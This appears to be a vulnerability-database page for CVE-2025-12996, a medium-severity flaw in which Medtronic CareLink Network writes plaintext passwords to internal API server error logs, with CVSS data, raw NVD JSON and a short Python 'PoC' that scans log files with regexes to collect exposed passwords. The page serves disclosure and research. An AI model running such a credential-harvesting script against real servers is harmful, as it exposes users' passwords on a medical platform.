Security Vulnerability Report
中文
CVE-2025-12996 CVSS 4.1 MEDIUM

CVE-2025-12996

Published: 2025-12-04 20:16:17
Last Modified: 2025-12-22 18:09:57

Description

Medtronic CareLink Network allows a local attacker with access to log files on an internal API server to view plaintext passwords from errors logged under certain circumstances. This issue affects CareLink Network: before December 4, 2025.

CVSS Details

CVSS Score
4.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:medtronic:carelink_network:*:*:*:*:*:*:*:* - VULNERABLE
Medtronic CareLink Network < 2025-12-04 版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12996 PoC - Log File Password Extraction # This PoC demonstrates the vulnerability where plaintext passwords # may be found in error logs of Medtronic CareLink Network import os import re def search_plaintext_passwords_in_logs(log_directory): """ Search for plaintext passwords in CareLink Network log files. Note: This requires local access to the internal API server. """ password_patterns = [ r'password[=:]\s*["\']?([^"\s,}]+)["\']?', r'pwd[=:]\s*["\']?([^"\s,}]+)["\']?', r'pass[=:]\s*["\']?([^"\s,}]+)["\']?', r'Authentication.*?["\']([^"\']+)["\']' ] exposed_credentials = [] for log_file in os.listdir(log_directory): if log_file.endswith('.log'): with open(os.path.join(log_directory, log_file), 'r') as f: content = f.read() for pattern in password_patterns: matches = re.findall(pattern, content, re.IGNORECASE) if matches: exposed_credentials.append({ 'file': log_file, 'credentials': matches }) return exposed_credentials # Example usage # log_dir = '/var/log/carelink/api/' # results = search_plaintext_passwords_in_logs(log_dir) # print(results)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12996", "sourceIdentifier": "[email protected]", "published": "2025-12-04T20:16:17.340", "lastModified": "2025-12-22T18:09:56.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Medtronic CareLink Network allows a local attacker with access to log files on an internal API server to view plaintext passwords from errors logged under certain circumstances. This issue affects CareLink Network: before December 4, 2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:medtronic:carelink_network:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-12-04", "matchCriteriaId": "F732E0FA-C285-4923-873F-3080AC1032F8"}]}]}], "references": [{"url": "https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}